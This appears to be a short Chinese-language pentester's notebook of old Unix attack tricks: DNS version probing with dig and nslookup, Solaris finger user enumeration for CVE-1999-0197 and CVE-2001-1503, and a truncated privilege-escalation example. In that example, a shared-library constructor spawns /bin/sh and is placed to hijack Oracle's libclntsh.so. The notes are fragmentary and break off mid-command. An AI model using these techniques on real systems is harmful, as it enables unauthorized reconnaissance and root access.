首先看这个连接:
http://images.google.cn/imgres?imgurl=http://www.telecomsec.org.cn/images/telecomsec2007/spon-DBAPPSecurit
nslookup -q=txt -class=chaos version.bind DNS_IP
dig @DNS_IP -c chaos version.bind txt
CVE-1999-0197 for Solaris 8/SUNOS 5.8
finger 123213@sunhost
CVE-2001-1503
finger 'a b c d e f g h'@sunhost
给客户做渗透测试的时候居然还能遇到CVE-1999-0197,才疏学浅~~~~~
一时没认出来。
渗透的时候也许会用得到,权限提升的一种办法。
-- Example with libclntsh.so $ cat test.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> void __attribute__ ((constructor)) my_init(void) { printf("[+] It works! Root shell...\n"); system("/bin/sh"); } $ cc test.c -fPIC -o test.so -shared $ mv /home/joxean/oracle10g/p